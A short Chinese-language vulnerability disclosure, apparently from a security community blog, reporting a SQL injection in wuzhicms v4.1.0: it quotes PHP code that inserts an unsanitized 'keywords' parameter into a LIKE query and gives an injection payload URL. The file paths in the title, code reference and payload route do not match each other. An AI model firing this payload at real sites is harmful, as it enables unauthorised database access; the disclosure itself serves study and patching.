wuzhicms v4.1.0 /coreframe/app/core/admin/copyfrom.php sql注入漏洞

漏洞文件:/coreframe/app/coupon/admin/copyfrom.php:22

public function listing() {  
       $siteid = get_cookie('siteid');  
       $page = isset($GLOBALS['page']) ? intval($GLOBALS['page']) : 1;  
       $page = max($page,1);  
       if(isset($GLOBALS['keywords'])) {  
           $keywords = $GLOBALS['keywords'];  
           $where = "name LIKE '%$keywords%'";  
       } else {  
           $where = '';  
       }  
   $result = $this->db->get_list('copyfrom', $where, '*', 0, 20,$page);  
 $pages = $this->db->pages;  
       $total = $this->db->number;  
   include $this->template('copyfrom_listing');  
}  

Payload

http://127.0.0.1/index.php?m=promote&f=index&v=search&_su=wuzhicms

图片[1]-wuzhicms v4.1.0 /coreframe/app/core/admin/copyfrom.php sql注入漏洞-孤勇者社区
 

&fieldtype=place&keywords=1111%'*%23
------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞13赞赏 分享
评论 共1条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像卡代0